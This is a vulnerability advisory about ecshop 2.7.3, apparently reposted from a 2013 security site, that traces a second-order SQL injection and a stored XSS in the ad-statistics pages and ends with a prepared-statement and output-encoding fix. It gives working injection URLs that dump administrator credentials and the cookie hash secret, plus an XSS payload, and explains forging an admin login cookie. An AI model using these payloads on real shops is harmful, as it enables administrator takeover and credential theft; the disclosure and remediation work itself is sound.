ecshop latest version: SQL injection + stored XSS = login as any administrator - vulnerability warning - the black bar safety net

2013-08-05T00:00:00
ID MYHACK58:62201340083
Type myhack58
Reporter blue
Modified 2013-08-05T00:00:00

Description

Brief description:

One function point suffers from SQL injection and stored XSS, and exploiting it involves a variety of small tricks. I think I'm just an artist.

Detailed description:

Tested only on ecshop V2.7.3.

  1. The vulnerability lies in the off-site advertising statistics feature (in the admin backend: Reports and Statistics -> Off-site JS placement), i.e. the /BOINC.php page. The from parameter (the referring site of the visitor) is stored in the database table ecs_adsense; when the backend "Off-site JS placement" page reads it back, the value is not filtered before it is placed into a SQL statement, resulting in a second-order injection.

/affiche.php line 119

$sql = "INSERT INTO " . $ecs->table('adsense') . " (from_ad, referer, clicks) VALUES ('-1', '" . $site_name . "', '1')"; // $site_name is $_GET['from'], written into the database

/admin/adsense.php lines 47-49

/* Get the total number of orders produced by the current ad */

$sql2 = 'SELECT COUNT(order_id) FROM ' . $ecs->table('order_info') . " WHERE from_ad='$rows[ad_id]' AND referer='$rows[referer]'"; // as you can see, the value read back from the database is not passed through addslashes again, leading to injection

$rows['order_num'] = $db->getOne($sql2);

  2. At the same time, the referer field is output without any filtering, resulting in stored XSS.

  3. The stored XSS alone is enough to grab a cookie and log into the backend, but why keep it that simple? Use the SQL injection twice, to obtain the hash_code from ecs_shop_config and the administrator's username + password, and generate the cookie ourselves. Wouldn't that be cooler?

/admin/privilege.php lines 136-141

if (isset($_POST['remember']))
{
    $time = gmtime() + 3600 * 24 * 365;
    setcookie('ECSCP[admin_id]', $row['user_id'], $time);
    setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);
}

Vulnerability proof:

http://localhost/test/ecshop/BOINC.php?from=a.baidu.com'%20and%201=2%20union%20select%20group_concat(user_id,'|',user_name,'|',password)%20from%20ecs_admin_user%20order%20by%201%20desc%23&ad_id=-1 // injection to obtain the administrator information

http://localhost/test/ecshop/BOINC.php?from=a.baidu.com'%20and%201=2%20union%20select%20%20value%20FROM%20ecs_shop_config%20WHERE%20code%20=%20'hash_code'%20order%20by%201%20desc%23&ad_id=-1 // injection to obtain the hash_code

http://localhost/test/ecshop/BOINC.php?from=a.baidu.com%3Cscript%3Ealert(1)%3C/script%3E&ad_id=-1 // the XSS; of course, I used xsser.me to collect the information from the page

Repair solutions:

Apply addslashes to the value read back from the database before it enters the SQL statement, and filter the referer field when it is output.
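To make the fix concrete, here is an added example of how the two vulnerable spots could be hardened. It is not ecshop's own code: it assumes a mysqli connection $db and the ecs_adsense / ecs_order_info tables named on this page, and the $rows array is the ad row read from ecs_adsense exactly as in the original admin/adsense.php. The point it illustrates is that a value coming out of the database is no more trustworthy than $_GET, because affiche.php wrote it there from $_GET['from'] in the first place; binding it as a parameter (instead of relying on addslashes) and HTML-encoding it on output closes both the second-order injection and the stored XSS.

```php
<?php
// Added example, not ecshop project code. Assumes a mysqli connection $db
// (ecshop uses its own $db wrapper; mysqli is used here for clarity) and the
// table names quoted on this page (ecs_adsense, ecs_order_info).
declare(strict_types=1);

/**
 * affiche.php side: record the referring site for an ad click.
 * The referer is bound as a parameter, so a quote in $_GET['from'] is stored
 * literally and can never break out of this statement.
 */
function record_ad_click(mysqli $db, int $fromAd, string $referer): void
{
    $stmt = $db->prepare(
        'INSERT INTO ecs_adsense (from_ad, referer, clicks) VALUES (?, ?, 1)'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('is', $fromAd, $referer);
    $stmt->execute();
    $stmt->close();
}

/**
 * admin/adsense.php side: count orders for one ad row.
 * Even though ad_id and referer come from ecs_adsense rather than from the
 * request, they are still bound rather than interpolated into the query.
 * This is what the original lines 47-49 fail to do, and it is exactly the
 * read-back step where the second-order injection happens.
 */
function count_orders_for_ad(mysqli $db, array $rows): int
{
    $stmt = $db->prepare(
        'SELECT COUNT(order_id) FROM ecs_order_info WHERE from_ad = ? AND referer = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $adId    = (int) $rows['ad_id'];
    $referer = (string) $rows['referer'];
    $stmt->bind_param('is', $adId, $referer);
    $stmt->execute();
    $stmt->bind_result($count);
    $stmt->fetch();
    $stmt->close();
    return (int) $count;
}

/**
 * Output filtering for the report template: the stored referer is encoded
 * so that a value such as <script>alert(1)</script> is rendered as text
 * instead of executing in the administrator's browser.
 */
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Illustrative use inside the report loop (hypothetical $db and $rows):
// $rows['order_num'] = count_orders_for_ad($db, $rows);
// echo '<td>' . html_out($rows['referer']) . '</td>';
```

Parameter binding replaces addslashes at both the write and the read-back step, so there is no second place where an escape can be forgotten; htmlspecialchars with ENT_QUOTES is applied at output time rather than at storage time, so the stored value stays intact for the statistics query while the browser never receives it as markup.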